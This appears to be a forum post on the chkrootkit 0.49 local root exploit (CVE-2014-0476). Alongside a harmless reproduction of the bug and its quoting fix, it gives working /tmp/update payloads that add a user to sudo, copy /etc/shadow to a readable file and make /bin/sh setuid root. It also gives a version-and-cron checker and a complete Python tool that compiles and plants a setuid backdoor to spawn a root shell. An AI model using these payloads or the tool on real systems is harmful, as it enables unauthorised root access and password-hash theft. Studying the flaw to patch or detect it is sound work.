Hello!

Security researchers have found a local privilege escalation in Chkrootkit 0.49 (CVE-2014-0476) that lets an unprivileged user run commands as root (the current Chkrootkit version, 0.50, fixes it).

Proof of concept

When Chkrootkit 0.49 runs, it executes the file /tmp/update, if one exists, with the privileges of whoever launched Chkrootkit. The cause is an unquoted variable expansion in its slapper() check, `file_port=$file_port $i`: with file_port empty, the shell parses that line as "run $i with file_port= in its environment" instead of appending the filename to the variable, and /tmp/update is one of the paths slapper() tests for.
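Why /tmp/update gets run: the shell script below is an added example, not code from the original post or from chkrootkit itself. It reproduces the faulty loop from chkrootkit 0.49's slapper() next to the quoted, hardened form. The file list is a subset of chkrootkit's SLAPPER_FILES, and the planted update script only drops a marker file instead of escalating privileges, so it is safe to run anywhere.

```shell
#!/bin/sh
# Added example (not from the original post or chkrootkit): minimal reproduction of the
# chkrootkit 0.49 slapper() bug, CVE-2014-0476. In slapper() the line
#     file_port=$file_port $i
# was meant to append the filename $i to $file_port. With file_port empty it is parsed
# as "run $i with file_port= in its environment", so a user-planted /tmp/update is
# executed by whoever runs chkrootkit, normally root via cron.

# Vulnerable form, mirroring chkrootkit 0.49. $1 plays the role of ${ROOTDIR}tmp.
slapper_vulnerable() {
    dir=$1
    file_port=
    # Subset of chkrootkit's SLAPPER_FILES list.
    for i in "$dir/.bugtraq" "$dir/update" "$dir/.cinik"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i      # BUG: executes $i instead of recording it
        fi
    done
    printf '%s\n' "$file_port"           # stays empty: the assignment never persisted
}

# Hardened form: quoting the right-hand side turns the line back into a plain assignment.
slapper_fixed() {
    dir=$1
    file_port=
    for i in "$dir/.bugtraq" "$dir/update" "$dir/.cinik"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"    # appends the filename, runs nothing
        fi
    done
    printf '%s\n' "$file_port"
}

# Scratch directory standing in for /tmp, with a harmless planted "update" that only
# drops a marker file next to itself (the real exploit would chown/chmod a backdoor).
setup_planted_tmp() {
    d=$(mktemp -d)
    printf '%s\n' '#!/bin/sh' 'touch "$(dirname "$0")/marker"' > "$d/update"
    chmod +x "$d/update"
    printf '%s\n' "$d"
}

# Demo: the vulnerable loop leaves the marker, the hardened loop only records the name.
demo() {
    d=$(setup_planted_tmp)
    slapper_vulnerable "$d" >/dev/null
    [ -f "$d/marker" ] && echo "vulnerable loop executed $d/update"
    rm -f "$d/marker"
    echo "hardened loop recorded:$(slapper_fixed "$d")"
    [ -f "$d/marker" ] || echo "hardened loop executed nothing"
    rm -rf "$d"
}
demo
```

The same parse applies whatever file_port already contains, as long as it has no spaces: `file_port=x /tmp/update` still executes /tmp/update. ShellCheck flags this pattern (SC2037), which is the cheapest way to catch it in your own scripts.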

Chkrootkit has to run as root, so it is normally launched with sudo (or by cron):

sudo chkrootkit

If an ordinary user runs it instead, it refuses:

hd@kali:/root$ chkrootkit

chkrootkit need root privileges

So Chkrootkit always runs as root, and therefore so does /tmp/update.

Now we can create /tmp/update to become root.

Privilege escalation

Make a user a sudoer (here bob, using Debian's adduser USER GROUP form)

#!/bin/bash

adduser bob sudo

Read /etc/shadow

#!/bin/bash

cat /etc/shadow > /tmp/shadow

then read /tmp/shadow (the copy is created by root; with the usual 022 umask it is world-readable).

Get a root shell

#!/bin/bash

chown root:root /bin/sh ; chmod 4777 /bin/sh

To get the root shell, execute /bin/sh. On Debian-based systems /bin/sh is a symlink to dash; chown and chmod follow the link, so dash itself becomes setuid root and keeps the privilege. Do not point this at bash: bash resets its effective uid at startup unless run with -p. Note also that 4777 leaves the system shell world-writable for every user, which is noisy and dangerous on a shared box.

bash-4.4$ whoami

hd

bash-4.4$ /bin/sh

# whoami

root

#

Don't forget to make /tmp/update executable (chkrootkit only tests that the file exists, but the kernel still needs +x to run it):

chmod +x /tmp/update

End



/tmp/update is executed every time Chkrootkit runs, so check cron (on Debian-based systems /etc/cron.daily/chkrootkit, enabled through /etc/chkrootkit.conf) to find out when it is launched.

At that point the content of /tmp/update is executed as root and you can become root or run commands as root.
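Before planting the trigger, confirm the preconditions. The shell script below is an added example, not part of the original post or of chkrootkit: it parses the version printed by `chkrootkit -V`, flags anything at or below 0.49, scans crontab text for a non-comment line that launches chkrootkit, and checks that the trigger file exists and is executable. The sample version string and crontab lines embedded in it are constructed, and the paths in live_check() assume a Debian-style cron layout.

```shell
#!/bin/sh
# Added example (not from the original post or chkrootkit): pre-flight checks for the
# chkrootkit 0.49 /tmp/update trigger. Functions take their input as arguments so they
# can be run against captured `chkrootkit -V` output and crontab text as well as live.

# Constructed samples used by demo_samples(); they are not real system output.
SAMPLE_VERSION='chkrootkit version 0.49'
SAMPLE_CRONTAB='# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 3     * * *   root    /usr/sbin/chkrootkit -q'

# Extract "major.minor" from `chkrootkit -V` output such as "chkrootkit version 0.49".
chkrootkit_version() {
    printf '%s\n' "$1" |
        sed -n 's/.*version[[:space:]]*\([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p' | head -n 1
}

# True (0) when the version is 0.49 or older, i.e. before the fix shipped in 0.50.
version_vulnerable() {
    v=$(chkrootkit_version "$1")
    [ -n "$v" ] || return 1
    major=${v%%.*}
    minor=${v#*.}
    if [ "$major" -eq 0 ] && [ "$minor" -le 49 ]; then
        return 0
    fi
    return 1
}

# True when a non-comment line of the crontab text in $1 launches chkrootkit.
# Only the command part is matched, so /etc/crontab, /etc/cron.d/* and per-user
# crontabs all work.
cron_runs_chkrootkit() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep -q 'chkrootkit'
}

# True when the trigger path exists and is executable (chkrootkit only tests -f,
# but the kernel still needs +x to run it).
trigger_ready() {
    [ -f "$1" ] && [ -x "$1" ]
}

# Run the checks against the constructed samples.
demo_samples() {
    if version_vulnerable "$SAMPLE_VERSION"; then
        echo "[sample] $(chkrootkit_version "$SAMPLE_VERSION") is vulnerable"
    fi
    if cron_runs_chkrootkit "$SAMPLE_CRONTAB"; then
        echo "[sample] crontab launches chkrootkit"
    fi
}

# Live check against the local box (paths assume a Debian-style cron layout).
live_check() {
    if command -v chkrootkit >/dev/null 2>&1; then
        out=$(chkrootkit -V 2>&1 || true)
        if version_vulnerable "$out"; then
            echo "[+] chkrootkit $(chkrootkit_version "$out") is vulnerable"
        else
            echo "[-] chkrootkit $(chkrootkit_version "$out") is not vulnerable"
        fi
    else
        echo "[-] chkrootkit not found in PATH"
    fi
    for f in /etc/crontab /etc/cron.d/* /etc/cron.daily/chkrootkit; do
        [ -r "$f" ] || continue
        if cron_runs_chkrootkit "$(cat "$f")"; then
            echo "[+] $f launches chkrootkit"
        fi
    done
    if trigger_ready /tmp/update; then
        echo "[+] /tmp/update is in place and executable"
    else
        echo "[-] /tmp/update is missing or not executable"
    fi
}

demo_samples
live_check
```

The version test deliberately compares numbers rather than grepping for "0.49", so 0.48 and older are reported as vulnerable too and a future "0.49x"-style string cannot match by accident.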

Exploit documentation: https://www.exploit-db.com/exploits/33899/



I've made a tool in Python to get r00t using this exploit.





#!/usr/bin/env python3
# Chkrootkit 0.49 local root: plant /tmp/update so that the root-run chkrootkit
# makes our compiled backdoor setuid root (Python 3 port of the Python 2 tool,
# which used the removed `commands` module).

import os
import subprocess
import sys
import time

CHKROOTKIT = '/usr/sbin/chkrootkit'
SUID_SRC = '/var/tmp/suid.c'
SUID_BIN = '/var/tmp/suid'
TRIGGER = '/tmp/update'

# Simple setuid backdoor: once chkrootkit has chowned it to root and set 4755,
# setuid(0) makes both real and effective uid root and $SHELL runs as root.
SUID_C = """#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(void)
{
    setuid(0);
    system("$SHELL");
    return 0;
}
"""


def run(cmd):
    """Run a shell command and return its combined stdout/stderr as text."""
    return subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT, text=True).stdout


print("[*] checking if chkrootkit is installed")
if not os.path.exists(CHKROOTKIT):
    sys.exit("[-] chkrootkit is not installed")
print("[+] chkrootkit is installed")

print("[*] checking if chkrootkit's version is vulnerable")
if "0.49" not in run("{} -V".format(CHKROOTKIT)):
    sys.exit("[-] chkrootkit is not vulnerable")
print("[+] chkrootkit is vulnerable")

print("[*] writing SUID executable")
with open(SUID_SRC, "w") as src:
    src.write(SUID_C)

print("[*] compiling SUID executable")
os.system("gcc {} -o {}".format(SUID_SRC, SUID_BIN))

print("[*] exploiting chkrootkit vulnerability")
# chkrootkit's slapper() runs /tmp/update as root; make it flip our binary to setuid root.
with open(TRIGGER, "w") as update:
    update.write("#!/bin/bash\n")
    update.write("chown root:root {0} ; chmod 4755 {0}\n".format(SUID_BIN))
os.chmod(TRIGGER, 0o755)

print()
print("[*] waiting 5 minutes before chkrootkit executes our backdoor with root permissions")
time.sleep(300)

if "-rwsr-xr-x" in run("ls -lah {}".format(SUID_BIN)):
    print("got r00t ? ")
    os.system(SUID_BIN)
else:
    print("[-] chkrootkit wasn't executed by crontab in 5 minutes ... wait for the next "
          "cron run of chkrootkit, then execute {} and you will get a root shell".format(SUID_BIN))
    sys.exit()